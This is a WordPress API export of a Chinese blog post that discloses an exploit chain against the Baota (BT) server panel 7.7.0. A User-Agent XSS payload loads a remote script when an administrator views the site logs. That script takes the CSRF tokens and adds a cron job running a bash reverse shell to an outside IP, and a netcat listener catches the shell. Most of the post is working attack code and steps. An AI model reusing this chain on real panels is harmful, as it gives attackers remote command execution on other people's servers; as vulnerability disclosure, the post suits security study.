{"id":388,"date":"2022-07-19T00:57:25","date_gmt":"2022-07-18T16:57:25","guid":{"rendered":"https:\/\/aaaahui.top\/?p=388"},"modified":"2022-08-13T21:23:24","modified_gmt":"2022-08-13T13:23:24","slug":"baota_xss_csrf_getshell","status":"publish","type":"post","link":"https:\/\/ahui.blog\/index.php\/2022\/07\/19\/baota_xss_csrf_getshell\/","title":{"rendered":"\u5b9d\u5854\u7f51\u7ad9\u65e5\u5fd7XSS\u5bfc\u81f4getshell"},"content":{"rendered":"<p><strong>\u524d\u8a00\uff1a\u8fd9\u4e2a\u6f0f\u6d1e\u662f\u6211\u572821\u5e7412\u6708\u53d1\u73b0\u7684\uff0c\u5f53\u65f6\u51c6\u5907\u4ea4\u7ed9\u5b9d\u5854\u5728\u8865\u5929\u7684\u9879\u76ee\uff0c\u7ed3\u679c\u5b9d\u5854\u4e0d\u6536xss\uff0c\u6240\u4ee5\u5c31\u6ca1\u4ea4\uff0c\u4eca\u5929\u53d1\u73b0\u6709\u4eba\u53d1\u51fa\u6765\u4e86\uff0c\u90a3\u6211\u4e5f\u53d1\u5230\u81ea\u5df1\u535a\u5ba2\u597d\u4e86\u3002\u3002<\/strong><\/p>\n<p><strong>\u6f0f\u6d1e\u5b8c\u6574\u653b\u51fb\u6d41\u7a0b\u4e3a\uff1a\u653b\u51fb\u8005\u653b\u51fb\u7f51\u7ad9-&gt;\u7ba1\u7406\u5458\u67e5\u770b\u65e5\u5fd7-&gt;\u653b\u51fb\u8005getshell<\/strong><\/p>\n<p><strong>\u9700\u8981\u51c6\u5907\u4e00\u53f0\u63a5\u6536\u53cd\u5f39shell\u7684\u670d\u52a1\u5668\uff0c\u9884\u88c5nc\uff0c\u8fd9\u91cc\u4f7f\u7528\u7684\u5b9d\u5854\u6d4b\u8bd5\u73af\u5883\u4e3a\u963f\u91cc\u4e91\u670d\u52a1\u5668\u642d\u5efa\uff0c\u7248\u672c\u4e3a7.7.0\u6b63\u5f0f\u7248<\/strong><\/p>\n<p>\u4e00\uff0e  \u9996\u5148\u51c6\u5907\u597d\u8fdc\u7a0bjs\u6587\u4ef6\uff0c\u5177\u4f53\u5185\u5bb9\u5982\u4e0b\uff08js\u6587\u4ef6body\u5185\u5bb9\u6839\u636e\u81ea\u5df1nc\u670d\u52a1\u5668\u548c\u76d1\u542c\u7684\u7aef\u53e3\u8fdb\u884c\u8c03\u6574\uff09\uff1a<\/p>\n<pre><code class=\"language-js\">var x_http_token = document.getElementById(&#039;request_token_head&#039;).getAttribute(&quot;token&quot;);\n\nvar x_cookie_token = getCookie(&#039;request_token&#039;);\n\nfetch(&quot;\/crontab?action=AddCrontab&quot;,{method: &quot;POST&quot;,headers: {&#039;Content-Type&#039;:&#039;application\/x-www-form-urlencoded;charset=UTF-8&#039;,&#039;x-http-token&#039;:x_http_token,&#039;x-cookie-token&#039;:x_cookie_token},body:&#039;name=test&amp;type=minute-n&amp;where1=1&amp;hour=&amp;minute=&amp;week=&amp;sType=toShell&amp;sBody=bash+-i+%3E%26+%2Fdev%2Ftcp%2F70.34.204.98%2F8889+0%3E%261&amp;sName=&amp;backupTo=localhost&amp;save=&amp;sBody=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F70.34.204.98%2F8889%200%3E%261&amp;urladdress=undefined&amp;save_local=undefined&amp;notice=undefined&amp;notice_channel=undefined&#039;});<\/code><\/pre>\n<p>\u5c06js\u6587\u4ef6\u4fdd\u5b58\u5728\u8fdc\u7a0bweb\u670d\u52a1\u5668\u4e2d\uff0c\u6211\u8fd9\u91cc\u4fdd\u5b58\u5728http:\/\/70.34.204.98\/baota.js, \u5176\u4e2dbody\u4fe1\u606f\u4e3a\u6293\u53d6\u8bbe\u7f6e\u8ba1\u5212\u4efb\u52a1\u8bf7\u6c42\u5305\u4e2d\u7684post\u6570\u636e\u90e8\u5206\uff0c\u5982\u4e0b\u56fe\u6570\u636e\u5305\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image002.jpg\" alt=\"\" \/><\/p>\n<p>POC\u6ce8\u89e3\uff1a\u9996\u5148\u83b7\u53d6\u53d1\u8d77\u8bf7\u6c42\u65f6header\u4e2d\u9700\u8981\u7684\u4e24\u4e2a\u7528\u4f5c\u8eab\u4efd\u8ba4\u8bc1\u7684cookie\uff0c\u7136\u540e\u53d1\u8d77\u8bf7\u6c42\uff0c\u6b64\u8bf7\u6c42\u4e3a\u6dfb\u52a0\u6bcf\u5206\u949f\u6267\u884c\u4e00\u6b21\u7684\u8ba1\u5212\u4efb\u52a1\u7684\u8bf7\u6c42\u5305\uff0c\u7ecf\u8fc7\u6d4b\u8bd5\uff0c\u9664\u4e86\u5199\u8ba1\u5212\u4efb\u52a1\u5916\uff0c\u8fd8\u53ef\u4ee5\u50cfweb\u7f51\u7ad9\u5199\u5165webshell\uff0c\u5411\u5b9d\u5854\u7ba1\u7406\u9762\u677f\u5199\u5165webshell\uff08flask\u6846\u67b6\uff09\uff0c\u4f46\u662f\u4e3a\u9a8c\u8bc1\u5371\u5bb3\uff0c\u8fd9\u91cc\u76f4\u63a5\u4f7f\u7528\u8ba1\u5212\u4efb\u52a1\u53cd\u5f39shell\u3002<\/p>\n<p>\u4e8c\uff0e  \u7136\u540e\u8bbf\u95ee\u5b9d\u5854\u9762\u677f\u4e2d\u90e8\u7f72\u7684\u7ad9\u70b9\uff0c\u8fd9\u91cc\u6dfb\u52a0\u4e00\u4e2a\u65b0\u7684\u7ad9\u70b9\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image004.jpg\" alt=\"\" \/><\/p>\n<p>\u7ad9\u70b9\u53ef\u4ee5\u6b63\u5e38\u8bbf\u95ee<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image006.jpg\" alt=\"\" \/><\/p>\n<p>\u4e09\uff0e  \u7136\u540e\u8bf7\u6c42\u6b64\u7ad9\u70b9\u5e76\u6293\u5305\uff0c\u5728User-Agent\u5904\u66ff\u6362\u4e3a\u6211\u4eec\u7684xsspayload\uff0c\u5916\u90e8js\u94fe\u63a5\u4e3a\u6211\u4eec\u4e0a\u9762\u51c6\u5907\u7684\u8fdc\u7a0bjs\u6587\u4ef6\uff0c\u8fd9\u91cc\u6574\u4f53payload\u4e3a\uff1a<\/p>\n<pre><code class=\"language-js\">&lt;\/textarea&gt;&lt;script src=&#039;http:\/\/70.34.204.98\/baota.js&#039;&gt;&lt;\/script&gt;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image008.jpg\" alt=\"\" \/><\/p>\n<p>Payload\u586b\u5145\u5b8c\u6bd5\u53d1\u9001\u6570\u636e\u5305<\/p>\n<p>\u56db\uff0e  \u5728\u6211\u4eec\u7684\u670d\u52a1\u5668\u4e0a\u5f00\u542fnc\u76d1\u542c\uff0c\u547d\u4ee4\u4e3anc -lvvp 8889<br \/>\n<img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image009.png\" alt=\"\" \/><\/p>\n<p>\u4e94\uff0e  \u7136\u540e\u6a21\u62df\u7ba1\u7406\u5458\u67e5\u770bweb\u7ad9\u70b9\u7f51\u7ad9\u65e5\u5fd7\uff0c\u9996\u5148\u70b9\u51fb\u7f51\u7ad9\u540d<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image011.jpg\" alt=\"\" \/><\/p>\n<p>\u63a5\u7740\u5411\u4e0b\u627e\u5230\u7f51\u7ad9\u65e5\u5fd7\uff0c\u70b9\u51fb\u7f51\u7ad9\u65e5\u5fd7<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image013.jpg\" alt=\"\" \/><\/p>\n<p>\u8fd9\u91cc\u4e3a\u5c55\u793a\u6f0f\u6d1e\u539f\u7406\uff0c\u6293\u5305\u67e5\u770b\u52a0\u8f7d\u6211\u4eec\u5916\u90e8js\u540e\u53d1\u51fa\u7684\u6570\u636e\u5305<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image015.jpg\" alt=\"\" \/><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u81ea\u52a8\u53d1\u9001\u4e86\u8bbe\u7f6e\u8ba1\u5212\u4efb\u52a1\u7684\u6570\u636e\u5305\uff0c\u6211\u4eec\u6293\u4e00\u4e0b\u8fd4\u56de\u5305\u67e5\u770b<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image017.jpg\" alt=\"\" \/><\/p>\n<p>\u8bbe\u7f6e\u6210\u529f\uff0c\u67e5\u770b\u8ba1\u5212\u4efb\u52a1\u5217\u8868\uff0c\u786e\u5b9e\u6dfb\u52a0\u8fdb\u53bb\u4e86\u8ba1\u5212\u4efb\u52a1<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image019.jpg\" alt=\"\" \/><\/p>\n<p>\u516d\uff0e  \u7b49\u5f85\u4e00\u5206\u949f\uff0cnc\u76d1\u542c\u5668\u5c31\u63a5\u6536\u5230\u4e86shell<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image021.jpg\" alt=\"\" \/><\/p>\n<p>\u53ef\u4ee5\u6b63\u5e38\u6267\u884c\u547d\u4ee4<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/ahui.blog\/wp-content\/uploads\/2022\/07\/clip_image023.jpg\" alt=\"\" \/><\/p>\n<p>\u4e03\uff0e  \u81f3\u6b64\u8be5\u65e5\u5fd7xss\u5bfc\u81f4getshell\u590d\u73b0\u5b8c\u6bd5\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u524d\u8a00\uff1a\u8fd9\u4e2a\u6f0f\u6d1e\u662f\u6211\u572821\u5e7412\u6708\u53d1\u73b0\u7684\uff0c\u5f53\u65f6\u51c6\u5907\u4ea4\u7ed9\u5b9d\u5854\u5728\u8865\u5929\u7684\u9879\u76ee\uff0c\u7ed3\u679c\u5b9d\u5854\u4e0d\u6536xss\uff0c\u6240\u4ee5\u5c31\u6ca1\u4ea4\uff0c\u4eca\u5929\u53d1\u73b0 &#8230; <a title=\"\u5b9d\u5854\u7f51\u7ad9\u65e5\u5fd7XSS\u5bfc\u81f4getshell\" class=\"read-more\" href=\"https:\/\/ahui.blog\/index.php\/2022\/07\/19\/baota_xss_csrf_getshell\/\" aria-label=\"\u7ee7\u7eed\u9605\u8bfb\u5b9d\u5854\u7f51\u7ad9\u65e5\u5fd7XSS\u5bfc\u81f4getshell\">\u9605\u8bfb\u66f4\u591a<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[20],"class_list":["post-388","post","type-post","status-publish","format-standard","hentry","category-vulnerability_mining","tag-vulnerability_mining"],"_links":{"self":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/comments?post=388"}],"version-history":[{"count":1,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/388\/revisions"}],"predecessor-version":[{"id":413,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/posts\/388\/revisions\/413"}],"wp:attachment":[{"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/media?parent=388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/categories?post=388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ahui.blog\/index.php\/wp-json\/wp\/v2\/tags?post=388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}